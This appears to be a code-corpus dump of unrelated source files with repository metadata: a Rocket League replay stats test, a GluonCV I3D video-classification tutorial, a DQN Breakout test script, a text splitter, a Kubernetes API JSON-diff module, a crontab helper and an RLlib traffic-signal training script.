{'item': BALL_FREEZE, 'used': 2, 'unused': 1},
{'item': BALL_GRAPPLING_HOOK, 'used': 2, 'unused': 1},
{'item': BALL_LASSO, 'used': 4, 'unused': 0},
{'item': BALL_SPRING, 'used': 4, 'unused': 0},
{'item': BALL_VELCRO, 'used': 2, 'unused': 2},
{'item': BOOST_OVERRIDE, 'used': 5, 'unused': 1},
{'item': CAR_SPRING, 'used': 3, 'unused': 1},
{'item': GRAVITY_WELL, 'used': 5, 'unused': 0},
{'item': STRONG_HIT, 'used': 5, 'unused': 0},
{'item': SWAPPER, 'used': 4, 'unused': 1},
{'item': TORNADO, 'used': 1, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.teams[1].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 6, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 5, 'unused': 1},
{'item': BALL_LASSO, 'used': 5, 'unused': 0},
{'item': BALL_SPRING, 'used': 2, 'unused': 0},
{'item': BALL_VELCRO, 'used': 2, 'unused': 1},
{'item': BOOST_OVERRIDE, 'used': 5, 'unused': 0},
{'item': CAR_SPRING, 'used': 3, 'unused': 1},
{'item': GRAVITY_WELL, 'used': 4, 'unused': 0},
{'item': STRONG_HIT, 'used': 4, 'unused': 0},
{'item': SWAPPER, 'used': 4, 'unused': 2},
{'item': TORNADO, 'used': 1, 'unused': 1}
])
run_analysis_test_on_replay(test, get_raw_replays()["RUMBLE_FULL"])
def assert_rumble_item_counts(self, rumble_stats_proto, expected):
result_stats = list(map(proto_to_dict, rumble_stats_proto.rumble_items))
self.assertCountEqual(result_stats, expected)
def proto_to_dict(item_proto):
return {
'item': item_proto.item,
'used': item_proto.used,
'unused': item_proto.unused
}
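# The suite can be run with unittest directly, e.g. (assumed module path):
#   python -m unittest carball.tests.stats.rumble_test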
docs/tutorials/action_recognition/demo_i3d_kinetics400.py | Kh4L/gluon-cv | 5,447 | 6616681 | """3. Getting Started with Pre-trained I3D Models on Kinetics400
================================================================
`Kinetics400 <https://deepmind.com/research/open-source/kinetics>`_ is an action recognition dataset
of realistic action videos, collected from YouTube. With 306,245 short trimmed videos
from 400 action categories, it is one of the largest and most widely used dataset in the research
community for benchmarking state-of-the-art video action recognition models.
`I3D <https://arxiv.org/abs/1705.07750>`_ (Inflated 3D Networks) is a widely adopted 3D video
classification network. It uses 3D convolution to learn spatiotemporal information directly from videos.
I3D is proposed to improve `C3D <https://arxiv.org/abs/1412.0767>`_ (Convolutional 3D Networks) by inflating from 2D models.
We can not only reuse the 2D models' architecture (e.g., ResNet, Inception), but also bootstrap
the model weights from 2D pretrained models. In this manner, training 3D networks for video
classification is feasible and yields much better results.
In this tutorial, we will demonstrate how to load a pre-trained I3D model from :ref:`gluoncv-model-zoo`
and classify a video clip from the Internet or your local disk into one of the 400 action classes.
Step by Step
------------
We will try out a pre-trained I3D model on a single video clip.
First, please follow the `installation guide <../../index.html#installation>`__
to install ``MXNet`` and ``GluonCV`` if you haven't done so yet.
"""
import matplotlib.pyplot as plt
import numpy as np
import mxnet as mx
from mxnet import gluon, nd, image
from mxnet.gluon.data.vision import transforms
from gluoncv.data.transforms import video
from gluoncv import utils
from gluoncv.model_zoo import get_model
################################################################
# Then, we download the video and extract a 32-frame clip from it.
from gluoncv.utils.filesystem import try_import_decord
decord = try_import_decord()
url = 'https://github.com/bryanyzhu/tiny-ucf101/raw/master/abseiling_k400.mp4'
video_fname = utils.download(url)
vr = decord.VideoReader(video_fname)
frame_id_list = range(0, 64, 2)
video_data = vr.get_batch(frame_id_list).asnumpy()
clip_input = [video_data[vid, :, :, :] for vid, _ in enumerate(frame_id_list)]
################################################################
# Now we define transformations for the video clip.
# This transformation function does three things:
# center crop the image to 224x224 in size,
# transpose it to ``num_channels*num_frames*height*width``,
# and normalize with mean and standard deviation calculated across all ImageNet images.
transform_fn = video.VideoGroupValTransform(size=224, mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
clip_input = transform_fn(clip_input)
clip_input = np.stack(clip_input, axis=0)
clip_input = clip_input.reshape((-1,) + (32, 3, 224, 224))
clip_input = np.transpose(clip_input, (0, 2, 1, 3, 4))
print('Video data is downloaded and preprocessed.')
################################################################
# Next, we load a pre-trained I3D model.
model_name = 'i3d_inceptionv1_kinetics400'
net = get_model(model_name, nclass=400, pretrained=True)
print('%s model is successfully loaded.' % model_name)
################################################################
# Note that if you want to use InceptionV3 series model (i.e., i3d_inceptionv3_kinetics400),
# please resize the image to have both dimensions larger than 299 (e.g., 340x450) and change input size from 224 to 299
# in the transform function. Finally, we prepare the video clip and feed it to the model.
pred = net(nd.array(clip_input))
classes = net.classes
topK = 5
ind = nd.topk(pred, k=topK)[0].astype('int')
print('The input video clip is classified to be')
for i in range(topK):
print('\t[%s], with probability %.3f.'%
(classes[ind[i].asscalar()], nd.softmax(pred)[0][ind[i]].asscalar()))
################################################################
#
# We can see that our pre-trained model classifies this video clip
# as the ``abseiling`` action with high confidence.
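################################################################
# For reference, a minimal sketch of the InceptionV3 variant mentioned
# above (assuming ``i3d_inceptionv3_kinetics400`` is available in the model
# zoo and that frames were resized to e.g. 340x450 before cropping); only
# the crop size and model name change:
#
#     transform_fn = video.VideoGroupValTransform(size=299, mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
#     net = get_model('i3d_inceptionv3_kinetics400', nclass=400, pretrained=True)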
################################################################
# Next Step
# ---------
#
# If you would like to dive deeper into training I3D models on ``Kinetics400``,
# feel free to read the next `tutorial on Kinetics400 <dive_deep_i3d_kinetics400.html>`__.
test_agent.py | kzkadc/dqn_breakout | 0 | 6616682 | <filename>test_agent.py<gh_stars>0
# -*- coding: utf-8 -*-
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("model",help="model file")
parser.add_argument("-m","--movie",default=None,help="monitor")
parser.add_argument("-r","--random",action="store_true",help="random action")
parser.add_argument("-i","--image",default=None,help="capture images")
parser.add_argument("-q","--qplot",action="store_true",help="plot Q values")
args = parser.parse_args()
from main_breakout import *
import cv2
ENV_NAME = "Breakout-v0"
FRAME_NUM = 4 # 状態を構成するフレーム数
FRAME_SKIP = 4
QPLOT = args.qplot
MOVIE = args.movie is not None
if MOVIE: MOV_DIR = args.movie
RANDOM = args.random
IMAGE = args.image is not None
if IMAGE: IMG_DIR = args.image
env = Environment(ENV_NAME,FRAME_SKIP,FRAME_NUM)
env.timestep = 0
env.test_mode = True
agent = Agent(env.action_space)
if not RANDOM: agent.load_model(args.model)
agent.test_mode = True
if QPLOT:
out_file = open("plot_q_"+ENV_NAME+".csv","w")
out_file.write(ENV_NAME+"\nTimestep,V(s)\n")
if MOVIE:
env.to_movie_mode("./"+args.movie)
total_timestep = 0
for episode in xrange(1):
print "Episode {:d}:".format(episode)
#state = env.next_random_game()
env.env.reset()
for _ in xrange(env.frame_num):
state = env.step(0)[0]
done = False
total_reward = 0.0
timestep = 0
while not done:
timestep+=1
total_timestep+=1
if total_timestep % 100 == 0: print total_timestep
if QPLOT:
qvalue = agent.get_Q_values(state)
max_q = np.max(qvalue)
out_file.write("{:d},{:f}\n".format(timestep,max_q))
action = random.choice(env.action_space) if RANDOM else agent.select_action(state)
state,r,done,raw_obs = env.step(action,return_obs=True)
total_reward+=r
if IMAGE:
cv2.imwrite(("{}/obs{:05d}.png").format(IMG_DIR,total_timestep),raw_obs[:,:,::-1])
if QPLOT: out_file.close()
print " timestep={:d},total_reward={:.2f}".format(timestep,total_reward)
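# Example invocation (hypothetical model path; this script targets Python 2,
# and the -q/-m/-i flags are the argparse options defined above):
#   python test_agent.py breakout_model.h5 -q -m ./movie -i ./frames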
src/syncabook/split_text.py | ishine/syncabook | 57 | 6616683 | <reponame>ishine/syncabook<filename>src/syncabook/split_text.py
import os
import re
from .utils import get_number_of_digits_to_name
def split_text(text_file, output_dir, mode, pattern, n):
"""
Splits contents of `text_file` into several texts and saves them to `output_dir`.
"""
with open(text_file, 'r') as f:
text = f.read()
if mode in ['opening', 'delimeter'] and pattern is None:
print(f'\n❌ --pattern is required in {mode} mode.\n')
return
if mode == 'opening':
texts = _split_text_by_opening(pattern, text)
elif mode == 'delimeter':
texts = _split_text_by_delimeter(pattern, text)
elif mode == 'equal':
if n is None:
print(f'\n❌ --n is required in {mode} mode.\n')
return
texts = _split_text_into_n_parts(n, text, output_dir)
else:
print(f'\n❌ Unknown mode {mode}.\n')
if len(texts) > 0:
_save_texts(texts, output_dir)
print(f'✔ Splitting into {len(texts)} files is performed.')
def _split_text_by_opening(pattern, text):
"""
Splits text into parts identified by opening that matches `pattern`.
For example, --pattern='\n\nCHAPTER \\d+\n\n' may be used
to split text into chapters.
"""
openings = re.findall(pattern, text)
if len(openings) == 0:
print(f'\n❗ No text matching pattern "{pattern}". Splitting is not performed.\n')
return []
texts = re.split(pattern, text)
texts = [d + t for d, t in zip(openings, texts[1:])]
return texts
def _split_text_by_delimeter(pattern, text):
"""
Splits text into parts separated by delimeter that matches `pattern`.
Delimeter is not included in the returned texts.
For example, --pattern='\n\n---------\n\n' may be used if
    chapters are separated by a row of dashes.
"""
texts = re.split(pattern, text)
    if len(texts) <= 1:
        # re.split returns the whole text as a single element when the
        # delimiter never matches, so a length of 1 means nothing was split.
        print(f'\n❗ No text matching pattern "{pattern}". Splitting is not performed.\n')
        return []
    return texts
def _split_text_into_n_parts(n, text, output_dir):
"""
Splits text into `n` approximately equal parts.
    The splitting is performed only at paragraphs' boundaries.
"""
l = len(text) // n
texts = []
cur_part_start = 0
    for i in range(len(text) - 1):
        if i >= cur_part_start + l and text[i] == text[i + 1] == '\n':
texts.append(text[cur_part_start:i+2])
cur_part_start = i + 2
texts.append(text[cur_part_start:])
return texts
def _save_texts(texts, output_dir):
os.makedirs(output_dir, exist_ok=True)
for i, text in enumerate(texts, start=1):
n = get_number_of_digits_to_name(len(texts))
file_path = os.path.join(output_dir, f'{i:0>{n}}.txt')
with open(file_path, 'w') as f:
            f.write(text)
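# A minimal usage sketch (hypothetical file names), splitting a book at its
# chapter headings; `n` is only used in 'equal' mode:
#
#   split_text('book.txt', 'chapters/', mode='opening',
#              pattern=r'\n\nCHAPTER \d+\n\n', n=None)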
kab/kab/core/jsondiff.py | tengqm/kab | 3 | 6616684 | <filename>kab/kab/core/jsondiff.py
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import copy
import logging
import os
from django.conf import settings
from kab import consts
from kab.core import helpers
from kab.core import jsonutil
LOG = logging.getLogger(__name__)
class Diff(object):
def __init__(self, first, second, with_values=False):
self.difference = []
self.seen = []
self.check(first, second, with_values=with_values)
def check(self, first, second, path='', with_values=False):
if with_values and second is not None:
if not isinstance(first, type(second)):
message = '%s;; %s||%s' % (path, type(first).__name__,
type(second).__name__)
self.save("TYPE", message)
if isinstance(first, dict):
for key in first:
# the first part of path must not have trailing dot.
if len(path) == 0:
new_path = key
else:
new_path = "%s.%s" % (path, key)
message = new_path
if isinstance(second, dict):
if key in second:
sec = second[key]
else:
# key only in the first
self.save("PATH", message)
# prevent further values checking.
sec = None
# recursive call
if sec is not None:
self.check(first[key], sec, path=new_path,
with_values=with_values)
else:
# second is not dict.
# every key from first goes to the difference
self.save("PATH", message)
self.check(first[key], second, path=new_path,
with_values=with_values)
# if object is list, loop over it and check.
elif isinstance(first, list):
if not isinstance(second, list):
type1 = type(first).__name__
type2 = type(second).__name__
msg = '%s;; %s||%s' % (path, type1, type2)
self.save("TYPE", msg)
return
# process simple type
            if not first or not isinstance(first[0], (dict, list)):
first = sorted(first)
second = sorted(second)
if first != second:
msg = "%s;; %s||%s" % (path, first, second)
self.save("VALUE", msg)
return
for index, item in enumerate(first):
new_path = "%s[%s]" % (path, index)
sec = None
try:
sec = second[index]
self.check(item, sec, path=new_path,
with_values=with_values)
except (IndexError, KeyError):
msg = '%s;; %s||' % (new_path, str(item))
self.save("VALUE", msg)
# not list, not dict.
# check for equality (only if with_values is True) and return.
else:
if with_values and second is not None:
if first != second:
msg = "%s;; %s||%s" % (path, first, second)
self.save("VALUE", msg)
return
def save(self, kind, message):
if message not in self.difference:
self.seen.append(message)
self.difference.append((kind, message))
def compare_data(json1, json2):
"""Return the difference between two JSON.
The result looks like:
{
"ADDED": [
"foo.bar",
"zoo"
],
"REMOVED": [
"car.path[*].field"
],
"DESCRIPTION": {
"field.path1": {
"BEFORE": "text1",
"AFTER": "text2"
},
"(The resource)": {
"BEFORE": "old text",
"AFTER": "new text"
}
},
"CHANGED": [
"field.path": {
"BEFORE": "something",
"AFTER": "else"
}
]
}
"""
# first round check removed properties and changed values
diff1 = Diff(json1, json2, True).difference
# second round check newly added properties
diff2 = Diff(json2, json1, False).difference
diffs = []
for kind, message in diff1:
newType = "REMOVED" if kind == "PATH" else "CHANGED"
diffs.append({'type': newType, 'message': message})
for kind, message in diff2:
# ignore value changes
if kind == "VALUE":
continue
diffs.append({'type': "ADDED", 'message': message})
result = {}
for diff in diffs:
key = diff['type']
value = diff['message']
if (key == "CHANGED"):
key_vals = value.split(';;')
vals = key_vals[1].split('||')
keypath = key_vals[0].replace("properties.", "")
keypath = keypath.replace(".items.", "[*].")
if keypath.endswith(".description"):
key = "DESCRIPTION"
keypath = keypath[:-12]
elif keypath == "description":
key = "DESCRIPTION"
keypath = "(The Resource)"
value = {
keypath: {
"BEFORE": vals[0].strip(),
"AFTER": vals[1].strip(),
}
}
else:
# handle pseudo jsonpath for object properties and array items
value = value.replace("properties.", "")
value = value.replace(".items.", "[*].")
out_vals = result.get(key)
if (out_vals):
out_vals.append(value)
result[key] = out_vals
else:
result[key] = [value]
return result
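# Illustrative (hypothetical) input and output for compare_data, matching
# the shape documented above:
#
#   >>> compare_data({'a': 1, 'b': {'c': 2}}, {'a': 1, 'b': {}})
#   {'REMOVED': ['b.c']}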
def compare(apis, file1, file2, root=None, recursive=True):
"""Compare two JSON files.
:param apis: The APIs for the two files.
:param file1: Name for the first definition file.
:param file2: Name for the second definition file.
:returns: None if either one of the data cannot be loaded.
"""
json1 = jsonutil.load_json(file1, apis[0], root=root, recursive=recursive)
if json1 is None:
return None
json2 = jsonutil.load_json(file2, apis[-1], root=root, recursive=recursive)
if json2 is None:
return None
return compare_data(json1, json2)
def _definition_filename(api, group, version, kind, root=None):
if root is None:
if settings.configured:
fmt = settings.DATA_DIR + "/{}/defs/{}.json"
else:
fmt = "data/{}/defs/{}.json"
else:
fmt = root + "/{}/defs/{}.json"
if kind == "Info":
fn = "io.k8s.apimachinery.pkg.version.Info"
elif kind == "IntOrString":
fn = "io.k8s.apimachinery.pkg.util.intstr.IntOrString"
elif kind == "RawExtension":
fn = "io.k8s.apimachinery.pkg.runtime.RawExtension"
elif kind == "Quantity":
fn = "io.k8s.apimachinery.pkg.api.resource.Quantity"
else:
fn = ".".join([group, version, kind])
return fmt.format(api, fn)
def compare_defs(apis, groups, versions, kinds, root=None):
file0 = _definition_filename(apis[0], groups[0], versions[0], kinds[0])
file1 = _definition_filename(apis[-1], groups[-1], versions[-1], kinds[-1])
return compare(apis, file0, file1, root=root)
def _populate_parameters(apiv, param_list):
param_dict = helpers.parameters(apiv)
data = {}
for p in param_list:
if "$ref" not in p:
data[p["name"]] = p
continue
pref = p.pop("$ref")
param_name = pref[13:]
if param_name not in param_dict:
LOG.warning("Parameter %s not found!", param_name)
continue
item = copy.deepcopy(p)
item.update(param_dict.get(param_name))
data[item["name"]] = item
return collections.OrderedDict(sorted(data.items()))
def compare_ops(apis, opids, root=None):
"""Returns the diff between any two operations.
The returned result looks like:
{
/* basic JSON diff for operation definition JSON */
"P_ADDED": {
"p1": "<HTML formatted text>",
"p2": "<HTML formatted desc>"
},
"P_REMOVED": {
"p0": "<HTML formatted text>"
},
"P_CHANGED": {
"p3": {
"BEFORE": "raw data",
"AFTER": "raw data"
}
}
"""
if root is None:
fmt = helpers.DATA_PATH + "/{}/ops/{}.json"
else:
fmt = root + "/{}/ops/{}.json"
file0 = fmt.format(apis[0], opids[0])
file1 = fmt.format(apis[-1], opids[-1])
json1 = jsonutil.load_json(file0, apis[0], recursive=False)
if json1 is None:
return None
json2 = jsonutil.load_json(file1, apis[-1], recursive=False)
if json2 is None:
return None
# basic JSON diff
params1 = json1.pop("parameters", [])
params2 = json2.pop("parameters", [])
result = compare_data(json1, json2)
# handle the parameters
parameters1 = _populate_parameters(apis[0], params1)
parameters2 = _populate_parameters(apis[-1], params2)
for p, v in parameters1.items():
if p not in parameters2:
removed = result.get("P_REMOVED", {})
removed[p] = v
result["P_REMOVED"] = removed
elif parameters1[p] != parameters2[p]:
changed = result.get("P_CHANGED", {})
items1 = sorted(parameters1[p].items())
items2 = sorted(parameters2[p].items())
changed[p] = {
"BEFORE": collections.OrderedDict(sorted(items1)),
"AFTER": collections.OrderedDict(sorted(items2)),
}
result["P_CHANGED"] = changed
for p, v in parameters2.items():
if p not in parameters1:
added = result.get("P_ADDED", {})
added[p] = v
result["P_ADDED"] = added
return result
def _parse_version(version):
"""
Split version into major and minor
"""
vs = version.split(".")
if len(vs) != 2:
return -1, -1
return int(vs[0]), int(vs[1])
def history(data_type, fname, ver_to=None, ver_from=None):
"""Get history of a particular definition or operation.
:param data_type: "defs" or "ops"
:param fname: the base name of the file to compare.
:param ver_to: the last version number string, optional.
    :param ver_from: the first version number string, optional.
"""
if ver_from is None:
ver_from = consts.API_VERSIONS[0][0]
if ver_to is None:
ver_to = consts.API_VERSIONS[-1][0]
vmajor0, vminor0 = _parse_version(ver_from)
vmajor1, vminor1 = _parse_version(ver_to)
if (vminor0 == vminor1) and (vmajor0 == vmajor1):
LOG.error("the two versions specified cannot be the same")
return None
minor_from = vminor0
minor_to = vminor0 + 1
key = os.path.splitext(fname)[0]
result = {}
while minor_to <= vminor1:
v0 = str(vmajor0) + "." + str(minor_from)
v1 = str(vmajor1) + "." + str(minor_to)
file0 = os.path.join(helpers.DATA_PATH, v0, data_type, fname)
file1 = os.path.join(helpers.DATA_PATH, v1, data_type, fname)
if not os.path.isfile(file0) and os.path.isfile(file1):
result[v1] = {"status": "ADDED"}
elif not os.path.isfile(file1) and os.path.isfile(file0):
result[v1] = {"status": "DELETED"}
else:
if data_type == "defs":
res = compare([v0, v1], file0, file1)
# The following is jsonpatch, the difference generated for
# description fields is not good. We can improve the
# module to generate something similar to JSON Patch format.
# j1 = jsonutil.load_json(file0, v0, root=".")
# j2 = jsonutil.load_json(file1, v1, root=".")
# d = jsonpatch.JsonPatch.from_diff(j1, j2)
# res = json.loads(d.to_string())
elif data_type == "ops":
res = compare_ops([v0, v1], [key])
if res:
result[v1] = {"status": "CHANGED", "changes": res}
minor_from += 1
minor_to += 1
return result
def _history(ver0, ver1):
# 1. handle definitions
defs = {}
d0 = {}
d1 = {}
# 1.1 first round scan
for k, v in helpers.DATA["definitions"].items():
for r in v.get(ver0, []):
appears_in = v.get("appearsIn", {}).get(ver0, [])
data = {
"id": r["id"],
"appearsIn": appears_in,
}
d0[(r["group"], r["version"], k)] = data
for r in v.get(ver1, []):
appears_in = v.get("appearsIn", {}).get(ver0, [])
data = {
"id": r["id"],
"appearsIn": appears_in,
}
d1[(r["group"], r["version"], k)] = data
# 1.2 second round scan
for gvk, v in d0.items():
if gvk not in d1: # dropped
defs[gvk] = v
defs[gvk]["status"] = "Removed"
continue
if settings.configured:
fmt = settings.DATA_DIR + "/{}/defs/{}.json"
else:
fmt = "data/{}/defs/{}.json"
f0 = fmt.format(ver0, v["id"])
f1 = fmt.format(ver1, v["id"])
diff = compare([ver0, ver1], f0, f1, recursive=False)
if diff is None:
continue
if len(diff) == 0:
continue
# definition changed
defs[gvk] = v
defs[gvk]["status"] = "Changed"
# 1.3 third round scan, for added definitions
for gvk, v in d1.items():
if gvk in d0:
continue
defs[gvk] = v
defs[gvk]["status"] = "Added"
# 2. handle operations
ops = []
# 2.1 check status of all operations
for k, v in helpers.DATA["operations"].items():
versions = v.get("versions", [])
status = None
if (ver0 in versions) and (ver1 not in versions):
status = "Removed"
elif (ver0 not in versions) and (ver1 in versions):
status = "Added"
elif (ver0 in versions) and (ver1 in versions):
diff = compare_ops([ver0, ver1], [k])
if diff is None:
continue
if len(diff) == 0:
continue
status = "Changed"
if status is None:
continue
gv_list = v["group_version"].split("/")
ops.append({
"status": status,
"id": k,
"group": gv_list[0],
"version": gv_list[-1],
"op": v["op_type"],
"target": v["target"],
"type": v["type"],
"description": v["description"],
})
# 2.2 sort ops by group and version
sorted_ops = sorted(ops, key=lambda k: (k["group"], k["op"]))
return {
"DEFS": defs,
"OPS": sorted_ops
}
def api_history(ver_to, ver_from=None):
# TODO: enable ver_from
vmajor, vminor1 = _parse_version(ver_to)
vminor0 = vminor1 - 1
minor_from = vminor0
minor_to = vminor0 + 1
result = {}
while minor_to <= vminor1:
v0 = str(vmajor) + "." + str(minor_from)
v1 = str(vmajor) + "." + str(minor_to)
result[(v0, v1)] = _history(v0, v1)
minor_from += 1
minor_to += 1
return result
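# Illustrative usage (assuming definition/operation data for versions 1.14
# and 1.15 exists under DATA_DIR):
#
#   changes = api_history("1.15")                    # diffs 1.14 -> 1.15
#   defs_changed = changes[("1.14", "1.15")]["DEFS"]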
utils/cron_util.py | haodaohong/zimt8 | 1 | 6616685 | # -*- coding: utf-8 -*-
import re
from datetime import datetime
from croniter import croniter
from utils.common_util import get_except
from utils.file_util import file_reads, file_writes
def crontab_item_remove(crontab_item, log_user='root'):
"""
    |##desc: Remove a crontab entry; requires ROOT privileges
    |##:param: log_user  the user whose crontab file is modified
|##:return: None
|##@author: jhuang
|##@time:9/1/2017
"""
crontabFile = "/var/spool/cron/%s" % (log_user)
crontabs = file_reads(crontabFile)
crontabsList = crontab_parse(crontabs, True)
if crontab_item in crontabsList:
crontabsList.remove(crontab_item)
crontabs = '\n'.join(crontabsList)
file_writes(crontabFile, crontabs + '\n')
def crontab_item_add(crontab_item, log_user='root'):
"""
    |##desc: Add a crontab entry; requires ROOT privileges
    |##:param: log_user  the user whose crontab file is modified
|##:return: None
|##@author: jhuang
|##@time:9/1/2017
"""
crontabFile = "/var/spool/cron/%s" % (log_user)
crontabs = file_reads(crontabFile)
crontabsList = crontab_parse(crontabs, True)
if crontab_item in crontabsList:
crontabsList.remove(crontab_item)
crontabsList.append(crontab_item)
crontabs = '\n'.join(crontabsList)
file_writes(crontabFile, crontabs + '\n')
def get_crond_next_time(interval, count=5):
"""
    |##@Function purpose: compute the next execution times of a cron expression
|##@Parameter description:None
|##@Return value:None
|##@Function logic:None
|##@author: jhuang
|##@time:
"""
timeList = []
    cron_iter = croniter(interval)
    for i in range(count):
        next_date = cron_iter.get_next(datetime)
next_date = datetime.strftime(next_date, '%Y-%m-%d %H:%M:%S')
timeList.append(next_date)
return timeList
def crontab_parse(crontabs, LineList=False):
"""
    |##@Function purpose: parse crontab content into entries
|##@Parameter description:None
|##@Return value:None
|##@Function logic:None
|##@author: jhuang
|##@time:
"""
try:
print crontabs
crontabs = re.findall('^(?:\d+|\*).*?\s+.*?\s+.*?\s+.*?\s+.*?\s+.*', crontabs, re.M)
crontab_list = []
if LineList:
for r in crontabs:
crontab_list.append(r.strip().strip('\n').strip('\r'))
return crontab_list
print crontabs
for crontab in crontabs:
dic = {}
# print crontab
dic['interval'] = str(
re.findall('(^(?:\d+|\*).*?\s+.*?\s+.*?\s+.*?\s+.*?\s+)(.*)', crontab, re.M)[0][0]).strip().strip(
'\n').strip('\r')
dic['what'] = str(
re.findall('(^(?:\d+|\*).*?\s+.*?\s+.*?\s+.*?\s+.*?\s+)(.*)', crontab, re.M)[0][1]).strip().strip(
'\n').strip('\r')
crontab = crontab.replace(' ', '')
crontab_list.append(dic)
return crontab_list
except Exception as e:
get_except(e)
return []
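# Illustrative usage (hypothetical command path; Python 2, as above):
#   crontab_item_add('*/5 * * * * /usr/bin/python /opt/job.py', log_user='root')
#   print get_crond_next_time('*/5 * * * *', count=3)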
| # -*- coding: utf-8 -*-
import re
from datetime import datetime
from croniter import croniter
from utils.common_util import get_except
from utils.file_util import file_reads, file_writes
def crontab_item_remove(crontab_item, log_user='root'):
"""
|##desc: 删除计划任务,需要ROOT权限
|##:param: log_user 添加到什么用户下面去
|##:return: None
|##@author: jhuang
|##@time:9/1/2017
"""
crontabFile = "/var/spool/cron/%s" % (log_user)
crontabs = file_reads(crontabFile)
crontabsList = crontab_parse(crontabs, True)
if crontab_item in crontabsList:
crontabsList.remove(crontab_item)
crontabs = '\n'.join(crontabsList)
file_writes(crontabFile, crontabs + '\n')
def crontab_item_add(crontab_item, log_user='root'):
"""
|##desc: 添加计划任务,需要ROOT权限
|##:param: log_user 添加到什么用户下面去
|##:return: None
|##@author: jhuang
|##@time:9/1/2017
"""
crontabFile = "/var/spool/cron/%s" % (log_user)
crontabs = file_reads(crontabFile)
crontabsList = crontab_parse(crontabs, True)
if crontab_item in crontabsList:
crontabsList.remove(crontab_item)
crontabsList.append(crontab_item)
crontabs = '\n'.join(crontabsList)
file_writes(crontabFile, crontabs + '\n')
def get_crond_next_time(interval, count=5):
"""
|##@Function purpose:计算下次执行时间
|##@Parameter description:None
|##@Return value:None
|##@Function logic:None
|##@author: jhuang
|##@time:
"""
timeList = []
iter = croniter(interval)
for i in range(count):
next_date = iter.get_next(datetime)
next_date = datetime.strftime(next_date, '%Y-%m-%d %H:%M:%S')
timeList.append(next_date)
return timeList
def crontab_parse(crontabs, LineList=False):
"""
|##@Function purpose:解析Crontab
|##@Parameter description:None
|##@Return value:None
|##@Function logic:None
|##@author: jhuang
|##@time:
"""
try:
        print(crontabs)
        crontabs = re.findall(r'^(?:\d+|\*).*?\s+.*?\s+.*?\s+.*?\s+.*?\s+.*', crontabs, re.M)
crontab_list = []
if LineList:
for r in crontabs:
crontab_list.append(r.strip().strip('\n').strip('\r'))
return crontab_list
        print(crontabs)
for crontab in crontabs:
dic = {}
# print crontab
            dic['interval'] = str(
                re.findall(r'(^(?:\d+|\*).*?\s+.*?\s+.*?\s+.*?\s+.*?\s+)(.*)', crontab, re.M)[0][0]).strip().strip(
                '\n').strip('\r')
            dic['what'] = str(
                re.findall(r'(^(?:\d+|\*).*?\s+.*?\s+.*?\s+.*?\s+.*?\s+)(.*)', crontab, re.M)[0][1]).strip().strip(
                '\n').strip('\r')
            crontab = crontab.replace(' ', '')  # note: rebinds the loop variable only; the stripped value is never used
crontab_list.append(dic)
return crontab_list
except Exception as e:
get_except(e)
return []
 | zh | 0.67748 | # -*- coding: utf-8 -*- |##desc: Remove a scheduled task (crontab entry); requires ROOT privileges |##:param: log_user -- the user whose crontab is modified |##:return: None |##@author: jhuang |##@time:9/1/2017 |##desc: Add a scheduled task (crontab entry); requires ROOT privileges |##:param: log_user -- the user whose crontab is modified |##:return: None |##@author: jhuang |##@time:9/1/2017 |##@Function purpose: compute the next execution times |##@Parameter description:None |##@Return value:None |##@Function logic:None |##@author: jhuang |##@time: |##@Function purpose: parse crontab text |##@Parameter description:None |##@Return value:None |##@Function logic:None |##@author: jhuang |##@time: # print crontab | 2.717633 | 3 |
Single_Agent/ScalableArchitecture/train.py | hrushikeshjadhav9/Multi-Commander | 79 | 6616686 | <gh_stars>10-100
import os
import argparse
import json
import logging
from datetime import datetime
import ray
import ray.rllib.agents.a3c as a3c
import ray.rllib.agents.dqn as dqn
import ray.rllib.agents.impala as impala
import ray.rllib.agents.ppo as ppo
from gym_cityflow.envs.cityflow_env import CityflowGymEnv
from ray import tune
from ray.rllib.agents.registry import get_agent_class
from ray.tune import grid_search, register_env
from utility import parse_roadnet
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
def gen_env_config():
# preparing config
# for environment
with open(args.config) as f:
config = json.load(f)
with open(config['cityflow_config_file']) as f:
cityflow_config = json.load(f)
roadnet_file = cityflow_config['dir'] + cityflow_config['roadnetFile']
config["num_step"] = args.num_step
config["state_time_span"] = args.state_time_span
config["time_span"] = args.time_span
config["lane_phase_info"] = parse_roadnet(roadnet_file)
intersection_id = list(config['lane_phase_info'].keys())[0]
# intersection_id = list(config['lane_phase_info'].keys())
config["intersection_id"] = intersection_id
phase_list = config['lane_phase_info'][intersection_id]['phase']
# logging.info(phase_list)
config["state_size"] = len(config['lane_phase_info'][intersection_id]['start_lane'])
config["action_size"] = len(phase_list)
config["batch_size"] = args.batch_size
return config
def gen_trainer_config(env_config):
# if args.algo == 'DQN':
# config = dqn.DEFAULT_CONFIG.copy()
# elif args.algo == 'PPO':
# config = ppo.DEFAULT_CONFIG.copy()
# elif args.algo == 'APEX':
# config = dqn.apex.APEX_DEFAULT_CONFIG.copy()
# elif args.algo == 'APPO':
# config = ppo.appo.DEFAULT_CONFIG.copy()
# elif args.algo == 'IMPALA':
# config = impala.DEFAULT_CONFIG.copy()
# elif args.algo == 'A3C':
# config = a3c.DEFAULT_CONFIG.copy()
# elif args.algo == 'A2C':
# config = a3c.a2c.A2C_DEFAULT_CONFIG.copy()
# else:
# assert 0 == 1, 'Unexpected args.algo.'
config = {"ignore_worker_failures": True,
"env": CityflowGymEnv, "env_config": env_config,
"num_gpus": 0, "num_workers": 24,
"num_cpus_per_worker": 1, # "num_gpus_per_worker": 0.03125,
"num_cpus_for_driver": 1}
# config['lr'] = grid_search([1e-2, 1e-3, 1e-4])
return config
def training_workflow(config_, reporter):
# build trainer
cls = get_agent_class(args.algo)
trainer = cls(env=CityflowGymEnv, config=config_)
for i in range(args.epoch):
res = trainer.train()
reporter(**res)
# if i % 100 == 0:
